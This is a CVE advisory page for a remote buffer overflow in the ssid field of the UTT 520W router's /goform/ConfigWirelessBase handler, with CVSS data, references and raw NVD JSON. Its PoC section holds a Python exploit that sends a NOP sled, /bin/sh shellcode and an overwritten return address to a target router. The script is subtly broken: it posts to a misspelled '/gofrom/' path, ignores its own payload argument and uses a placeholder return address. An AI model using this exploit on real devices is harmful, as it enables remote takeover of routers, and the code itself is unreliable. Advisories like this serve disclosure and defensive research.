CVE-2026-0838

Description

A security flaw has been discovered in UTT 进取 520W 1.7.7-180627. This impacts the function strcpy of the file /goform/ConfigWirelessBase. Performing a manipulation of the argument ssid results in buffer overflow. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

UTT 进取 520W < 1.7.7-180627

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2026-0838 PoC - UTT Router Buffer Overflow
# Target: UTT 进取 520W < 1.7.7-180627
# Module: /gofrom/ConfigWirelessBase

import requests
import sys

def exploit_buffer_overflow(target_ip, ssid_payload):
    """
    Send malicious ssid parameter to trigger buffer overflow
    in strcpy function at /gofrom/ConfigWirelessBase
    
    Args:
        target_ip: Target router IP address
        ssid_payload: Oversized string to overflow buffer
    """
    url = f"http://{target_ip}/gofrom/ConfigWirelessBase"
    
    # Construct payload with NOP sled + shellcode
    # NOP sled (0x90) helps ensure reliable execution
    nop_sled = b"\x90" * 100
    
    # Example shellcode: spawn /bin/sh shell
    # This is a simplified example shellcode
    shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
    
    payload = nop_sled + shellcode
    
    # Padding to reach return address overwrite
    padding = b"A" * (1000 - len(payload))
    
    # Return address pointing to NOP sled
    return_addr = b"\xaa\xbb\xcc\xdd"  # Should be adjusted based on firmware analysis
    
    exploit_data = payload + padding + return_addr
    
    data = {
        "ssid": exploit_data.decode('latin-1'),
        "action": "save"
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        print(f"[*] Payload sent to {url}")
        print(f"[*] Payload length: {len(exploit_data)} bytes")
        return response.status_code
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Exploiting CVE-2026-0838 on {target}")
    exploit_buffer_overflow(target, "A" * 1500)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0838
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0838
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0838/
[4] VulDB https://vuldb.com/cve/CVE-2026-0838
[5] https://github.com/Lena-lyy/cve/blob/main/1223/28.md
[6] https://vuldb.com/?ctiid.340438
[7] https://vuldb.com/?id.340438
[8] https://vuldb.com/?submit.729020

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0838", "sourceIdentifier": "[email protected]", "published": "2026-01-11T06:15:57.300", "lastModified": "2026-01-13T22:02:34.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in UTT 进取 520W 1.7.7-180627. This impacts the function strcpy of the file /goform/ConfigWirelessBase. Performing a manipulation of the argument ssid results in buffer overflow. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha descubierto un fallo de seguridad en UTT ?? 520W 1.7.7-180627. Esto afecta a la función strcpy del archivo /goform/ConfigWirelessBase. Realizar una manipulación del argumento ssid resulta en desbordamiento de búfer. El ataque es posible llevarlo a cabo remotamente. El exploit ha sido publicado y puede ser utilizado para ataques. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-180627", "matchCriteriaId": "1ED9CE5B-AC0E-4C53-A084-7777D5050400"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DD42AC5F-531F-40FC-BD78-D20F298AF79A"}]}]}], "references": [{"url": "https://github.com/Lena-lyy/cve/blob/main/1223/28.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.340438", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.340438", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.729020", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}